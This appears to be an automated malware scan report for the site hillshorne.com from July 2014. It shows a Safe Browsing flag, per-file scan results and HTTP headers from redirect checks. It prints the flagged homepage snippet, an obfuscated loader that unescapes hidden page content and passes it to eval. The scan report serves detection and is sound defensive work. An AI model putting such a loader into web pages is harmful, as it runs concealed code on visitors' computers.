Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hillshorne.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hillshorne.com/ | 200 OK Content-Length: 5593 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var YWE=eval, JIW=document.getElementById("JIW").innerHTML,pNX=unescape;YWE(pNX(JIW)); Antivirus reports:
| ||
http://hillshorne.com/css-js/prototype.lite.js | 200 OK Content-Length: 3335 Content-Type: application/javascript | clean |
http://hillshorne.com/css-js/moo.fx.js | 200 OK Content-Length: 3266 Content-Type: application/javascript | clean |
http://hillshorne.com/css-js/moo.fx.pack.js | 200 OK Content-Length: 6706 Content-Type: application/javascript | clean |
http://hillshorne.com/css-js/scripts.js | 200 OK Content-Length: 241 Content-Type: application/javascript | clean |
http://hillshorne.com/css-js/AC_RunActiveContent.js | 200 OK Content-Length: 3233 Content-Type: application/javascript | clean |
http://hillshorne.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 3233 Content-Type: application/javascript | clean |
http://hillshorne.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hillshorne.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Jul 2014 16:36:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224190331; path=/; expires=Thu, 17-Jul-2014 17:50:42 GMT
Set-Cookie: 60gp=R477018884; path=/; expires=Thu, 17-Jul-2014 17:42:27 GMT
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: hillshorne.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 17 Jul 2014 16:36:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224190331; path=/; expires=Thu, 17-Jul-2014 17:50:42 GMT
Set-Cookie: 60gp=R477018884; path=/; expires=Thu, 17-Jul-2014 17:42:27 GMT
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: hillshorne.com
Referer: http://www.google.com/search?q=hillshorne.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hillshorne.com
Referer: http://www.google.com/search?q=hillshorne.com
Result:
The result is similar to the first query. There are no suspicious redirects found.